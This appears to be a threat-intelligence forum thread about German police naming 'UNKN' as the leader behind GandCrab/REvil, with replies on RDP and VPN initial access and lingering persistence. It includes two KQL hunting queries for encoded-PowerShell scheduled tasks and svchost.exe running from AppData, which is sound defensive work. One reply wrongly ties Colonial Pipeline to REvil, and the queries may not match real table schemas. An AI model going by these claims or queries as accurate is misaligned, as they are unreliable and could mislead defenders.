The 'UNKN' Reveal: Analyzing OPSEC Failures in the GandCrab/REvil Ecosystem
Finally, we have a name to the mask. The BKA's doxing of Daniil Shchukin ('UNKN') closes a major chapter on the GandCrab/REvil saga. It’s fascinating that they tied him directly to 130 specific acts of sabotage between 2019-2021. While the headline is about the arrest, for us defenders, it’s a reminder of how persistent these legacy TTPs remain.
Even though REvil’s infrastructure was dismantled, the Double Extortion model they perfected is the blueprint for modern gangs. We often focus on the zero-days, but let's not forget the basics: Shchukin’s groups frequently gained initial access via RDP brute-forcing and unpatched VPN appliances.
If you are doing any retrospective hunting or auditing environments from that era, you might still find dormant persistence mechanisms. Here is a KQL query to help root out suspicious Scheduled Tasks that mimic the obfuscation techniques often used by REvil/Sodinokibi loaders:
// Hunt for suspicious scheduled tasks often associated with ransomware dwellers
ScheduledTask
| where TaskName contains "Update" or TaskName contains "System"
| where Action contains "powershell" and Action contains "-enc"
| where Author == "" or Author == "N/A" or Author contains "Administrator"
| project Timestamp, DeviceName, TaskName, Action, Author
| order by Timestamp desc
Given that the source code for GandCrab was "retired" but effectively recycled, are you still seeing traces of their encryption logic in modern, lower-tier ransomware families today?
We actually caught a derivative of the GandCrab v5 script on a legacy server last month during a decommissioning audit. It wasn't active, but the persistence mechanism was still in the registry run keys. It’s a testament to how long these artifacts can survive if you aren't doing aggressive EDR sweeping. The KQL query is solid—I added a filter for TriggerType == 6 (Boot) to catch the ones that fire up immediately on restart.
It’s wild that it took this long to tie him directly to GandCrab. The transition from GandCrab to REvil was always rumored to be an 'M&A' of the cybercrime world, but seeing the BKA confirm the continuity of leadership is huge. From a pentester's perspective, their RDP exploitation was brutal; they didn't need sophisticated 0-days when orgs were leaving port 3389 exposed to the world with weak passwords.
Good to see the 'UNKN' mystery solved. I'm more interested in the 130 confirmed victims in Germany alone. It makes you wonder about the global victim count that wasn't reported. We've seen a shift recently away from pure encryption to pure data extortion, likely because of the pressure REvil faced post-Colonial Pipeline. This arrest might accelerate that trend among newer gangs trying to avoid the same heat.
The scary part is how effective those legacy TTPs remain against unpatched OT systems. Even if the C2 is dead, the local encryption capability is the real threat. We've been hunting for specific file creation patterns associated with older REvil variants to ensure nothing is lingering near our DMZs.
DeviceProcessEvents
| where ProcessVersionInfoOriginalFilename == "svchost.exe"
| where FolderPath contains "AppData\\Roaming"
Verified Access Required
To maintain the integrity of our intelligence feeds, only verified partners and security professionals can post replies.
Request Access